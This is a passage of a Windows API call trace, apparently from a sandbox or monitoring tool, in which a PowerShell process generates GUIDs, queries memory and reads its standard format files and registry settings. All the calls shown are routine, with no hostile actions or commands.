	[0542.042] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xb951fc76, Data2=0x78be, Data3=0x4057, Data4=([0]=0xa9, [1]=0xfb, [2]=0xda, [3]=0x62, [4]=0xb8, [5]=0x6b, [6]=0x49, [7]=0xad))) returned 0x0
	[0542.899] VirtualQuery (in: lpAddress=0x1cc0e0, lpBuffer=0x1ccfa0, dwLength=0x30 | out: lpBuffer=0x1ccfa0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.900] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.901] VirtualQuery (in: lpAddress=0x1cb750, lpBuffer=0x1cc610, dwLength=0x30 | out: lpBuffer=0x1cc610*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.901] VirtualQuery (in: lpAddress=0x1cb750, lpBuffer=0x1cc610, dwLength=0x30 | out: lpBuffer=0x1cc610*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.903] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xcdf2a601, Data2=0x9b09, Data3=0x438f, Data4=([0]=0x91, [1]=0x96, [2]=0xe, [3]=0xec, [4]=0xa4, [5]=0x9c, [6]=0x65, [7]=0x5a))) returned 0x0
	[0542.903] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x845e7dd3, Data2=0x1e06, Data3=0x4cf7, Data4=([0]=0x99, [1]=0xb6, [2]=0x30, [3]=0xc2, [4]=0x9f, [5]=0x2b, [6]=0x9, [7]=0x43))) returned 0x0
	[0542.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.904] SetErrorMode (uMode=0x1) returned 0x1
	[0542.904] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0542.904] GetFileType (hFile=0x324) returned 0x1
	[0542.904] SetErrorMode (uMode=0x1) returned 0x1
	[0542.904] GetFileType (hFile=0x324) returned 0x1
	[0542.904] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.336] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.336] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.336] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.336] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.336] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.337] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.337] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.338] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.338] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.338] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.338] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.338] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.339] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.339] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.339] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.339] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.340] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0xbce, lpOverlapped=0x0) returned 1
	[0543.340] ReadFile (in: hFile=0x324, lpBuffer=0x2bea4a6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bea4a6*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0543.340] ReadFile (in: hFile=0x324, lpBuffer=0x2bead70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2bead70*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0543.340] CloseHandle (hObject=0x324) returned 1
	[0543.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.342] SetErrorMode (uMode=0x1) returned 0x1
	[0543.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0543.342] SetErrorMode (uMode=0x1) returned 0x1
	[0543.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0543.342] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0543.343] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
	[0543.343] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0543.343] CoTaskMemFree (pv=0x3f9870) 
	[0543.343] RegCloseKey (hKey=0x324) returned 0x0
	[0543.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.344] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xb854dfb8, Data2=0xa464, Data3=0x404c, Data4=([0]=0xb5, [1]=0xa9, [2]=0x44, [3]=0xd2, [4]=0x86, [5]=0x94, [6]=0xea, [7]=0x3b))) returned 0x0
	[0543.345] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x4a53a27d, Data2=0x1b78, Data3=0x4493, Data4=([0]=0x9a, [1]=0x10, [2]=0xd0, [3]=0x17, [4]=0xda, [5]=0x7f, [6]=0x51, [7]=0xcc))) returned 0x0
	[0543.345] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xc5a01ba, Data2=0x5876, Data3=0x4146, Data4=([0]=0x95, [1]=0x13, [2]=0xb8, [3]=0x7c, [4]=0x3, [5]=0x16, [6]=0x8, [7]=0x49))) returned 0x0
	[0543.346] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x91ec2d19, Data2=0x473d, Data3=0x4761, Data4=([0]=0x85, [1]=0xc5, [2]=0x7e, [3]=0x13, [4]=0xe, [5]=0x5, [6]=0x1f, [7]=0x4d))) returned 0x0
	[0543.346] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7516a573, Data2=0x82e4, Data3=0x47b1, Data4=([0]=0x96, [1]=0xfb, [2]=0xa4, [3]=0xbf, [4]=0x99, [5]=0x5e, [6]=0x5a, [7]=0xb1))) returned 0x0
	[0543.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xaac19a63, Data2=0x7120, Data3=0x448f, Data4=([0]=0xb5, [1]=0x81, [2]=0x24, [3]=0xc2, [4]=0x56, [5]=0x5, [6]=0x41, [7]=0xe6))) returned 0x0
	[0543.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x59477e7f, Data2=0x5d28, Data3=0x4066, Data4=([0]=0x86, [1]=0x8, [2]=0xbf, [3]=0x9b, [4]=0x27, [5]=0xa1, [6]=0x48, [7]=0xfa))) returned 0x0
	[0543.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x3a8c9865, Data2=0x9454, Data3=0x4b6e, Data4=([0]=0x9f, [1]=0x96, [2]=0xf3, [3]=0x73, [4]=0xaf, [5]=0xb, [6]=0xed, [7]=0xa3))) returned 0x0
	[0543.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x908126a9, Data2=0xb5a9, Data3=0x4077, Data4=([0]=0xbd, [1]=0x51, [2]=0x5e, [3]=0x55, [4]=0x73, [5]=0xa9, [6]=0xb5, [7]=0xd8))) returned 0x0
	[0543.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x83f9c0, Data2=0x7979, Data3=0x4a00, Data4=([0]=0xa6, [1]=0x7b, [2]=0x5c, [3]=0xe, [4]=0xf9, [5]=0xbc, [6]=0x8c, [7]=0x17))) returned 0x0
	[0543.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x4de6c8e0, Data2=0xcd1e, Data3=0x45d0, Data4=([0]=0xa7, [1]=0x3a, [2]=0x84, [3]=0xdc, [4]=0x4, [5]=0x11, [6]=0x42, [7]=0xd))) returned 0x0
	[0543.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6e5dfdae, Data2=0x8e3e, Data3=0x4745, Data4=([0]=0x9b, [1]=0x3d, [2]=0xe9, [3]=0xa8, [4]=0xfa, [5]=0xaf, [6]=0xdf, [7]=0xf3))) returned 0x0
	[0543.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf42f624c, Data2=0x1821, Data3=0x496b, Data4=([0]=0x8a, [1]=0x65, [2]=0x22, [3]=0x84, [4]=0xf7, [5]=0x7, [6]=0x46, [7]=0x75))) returned 0x0
	[0543.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8e1f4a2, Data2=0x4fb8, Data3=0x40c4, Data4=([0]=0x91, [1]=0x4f, [2]=0xc8, [3]=0xbb, [4]=0x36, [5]=0x13, [6]=0xfa, [7]=0x2))) returned 0x0
	[0543.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xab3ac9a6, Data2=0x8fd3, Data3=0x48c7, Data4=([0]=0x83, [1]=0xf3, [2]=0x4a, [3]=0x95, [4]=0xc8, [5]=0xba, [6]=0x20, [7]=0xce))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1bd4c5e6, Data2=0x1ad1, Data3=0x4d4b, Data4=([0]=0xa3, [1]=0x66, [2]=0x41, [3]=0xb1, [4]=0xd4, [5]=0xf7, [6]=0xfb, [7]=0xa1))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7784f0a7, Data2=0xee1, Data3=0x4dff, Data4=([0]=0x88, [1]=0x7d, [2]=0x38, [3]=0xbf, [4]=0xdb, [5]=0x66, [6]=0x8f, [7]=0xb8))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1d055a71, Data2=0xfb7d, Data3=0x4497, Data4=([0]=0x85, [1]=0x4b, [2]=0x33, [3]=0xfd, [4]=0x8c, [5]=0xb8, [6]=0x4a, [7]=0x8b))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf374d8c5, Data2=0xb07d, Data3=0x493e, Data4=([0]=0x84, [1]=0xd1, [2]=0x51, [3]=0x2, [4]=0x5e, [5]=0xf7, [6]=0x87, [7]=0x66))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x15aeb236, Data2=0x3a20, Data3=0x498b, Data4=([0]=0x8f, [1]=0x90, [2]=0xf1, [3]=0x17, [4]=0x51, [5]=0x8d, [6]=0xc9, [7]=0x5a))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9fd92624, Data2=0xa3b9, Data3=0x4112, Data4=([0]=0xab, [1]=0x76, [2]=0x1, [3]=0x57, [4]=0x8f, [5]=0xad, [6]=0x92, [7]=0x8d))) returned 0x0
	[0543.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x90203aac, Data2=0x45be, Data3=0x4184, Data4=([0]=0xa9, [1]=0x53, [2]=0x47, [3]=0x9c, [4]=0xc, [5]=0x7c, [6]=0xcb, [7]=0x5d))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x621d0198, Data2=0xd167, Data3=0x49a5, Data4=([0]=0x90, [1]=0x4, [2]=0x91, [3]=0xba, [4]=0xe7, [5]=0xb7, [6]=0x5a, [7]=0xff))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xbd6d2a5e, Data2=0xad4c, Data3=0x4c38, Data4=([0]=0x95, [1]=0x5f, [2]=0x50, [3]=0x24, [4]=0x73, [5]=0x77, [6]=0xc8, [7]=0x52))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x43a57d6c, Data2=0x8acb, Data3=0x4b7c, Data4=([0]=0xad, [1]=0xd8, [2]=0x42, [3]=0x3f, [4]=0x53, [5]=0x38, [6]=0xac, [7]=0xa4))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x3c46e4b7, Data2=0x8282, Data3=0x4e25, Data4=([0]=0xa8, [1]=0x3d, [2]=0xc6, [3]=0x3e, [4]=0x22, [5]=0xc6, [6]=0x20, [7]=0xd4))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xe2bb354e, Data2=0xc949, Data3=0x4c38, Data4=([0]=0xb2, [1]=0xff, [2]=0x42, [3]=0xea, [4]=0xc3, [5]=0xd2, [6]=0x76, [7]=0x2))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x592c3ae9, Data2=0x4782, Data3=0x4f0d, Data4=([0]=0x82, [1]=0x9d, [2]=0x76, [3]=0x61, [4]=0xe6, [5]=0x88, [6]=0x5e, [7]=0xa4))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x83cee936, Data2=0x46f0, Data3=0x4f60, Data4=([0]=0xa6, [1]=0x39, [2]=0xae, [3]=0x70, [4]=0xa, [5]=0x91, [6]=0x5f, [7]=0x22))) returned 0x0
	[0543.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xc0e5fdaa, Data2=0x6987, Data3=0x4c9e, Data4=([0]=0xa1, [1]=0x22, [2]=0x2e, [3]=0x25, [4]=0xc2, [5]=0x94, [6]=0x0, [7]=0x40))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x5a8b7405, Data2=0xef51, Data3=0x417e, Data4=([0]=0x8e, [1]=0x7f, [2]=0x8c, [3]=0x54, [4]=0x16, [5]=0x18, [6]=0x57, [7]=0xdf))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x261f7de1, Data2=0x7900, Data3=0x4988, Data4=([0]=0x81, [1]=0x21, [2]=0xea, [3]=0xfc, [4]=0x5b, [5]=0x1e, [6]=0x82, [7]=0x9))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xd4a16ef5, Data2=0xf665, Data3=0x4b48, Data4=([0]=0xbb, [1]=0x24, [2]=0x9a, [3]=0x54, [4]=0x5e, [5]=0xd0, [6]=0x42, [7]=0xe1))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6c383424, Data2=0x3f72, Data3=0x4964, Data4=([0]=0xa3, [1]=0xea, [2]=0x50, [3]=0x3c, [4]=0x42, [5]=0xa1, [6]=0x1e, [7]=0x98))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x93c68bd3, Data2=0x17f9, Data3=0x4314, Data4=([0]=0x89, [1]=0x9a, [2]=0x5d, [3]=0x4, [4]=0x6d, [5]=0xfc, [6]=0xc8, [7]=0x5a))) returned 0x0
	[0543.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x350050db, Data2=0xa2f3, Data3=0x4ba5, Data4=([0]=0x88, [1]=0x58, [2]=0x50, [3]=0x28, [4]=0xe5, [5]=0x75, [6]=0xea, [7]=0x14))) returned 0x0
	[0543.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1b99457f, Data2=0xaa90, Data3=0x4341, Data4=([0]=0xa6, [1]=0xcc, [2]=0x4e, [3]=0xea, [4]=0x23, [5]=0xb8, [6]=0xb5, [7]=0x10))) returned 0x0
	[0543.352] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0543.352] GetFileType (hFile=0x324) returned 0x1
	[0543.352] SetErrorMode (uMode=0x1) returned 0x1
	[0543.353] GetFileType (hFile=0x324) returned 0x1
	[0543.353] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.354] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x119, lpOverlapped=0x0) returned 1
	[0543.355] ReadFile (in: hFile=0x324, lpBuffer=0x2cfb358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2cfb358*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0543.355] CloseHandle (hObject=0x324) returned 1
	[0543.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.355] SetErrorMode (uMode=0x1) returned 0x1
	[0543.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0543.355] SetErrorMode (uMode=0x1) returned 0x1
	[0543.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0543.356] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0543.356] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
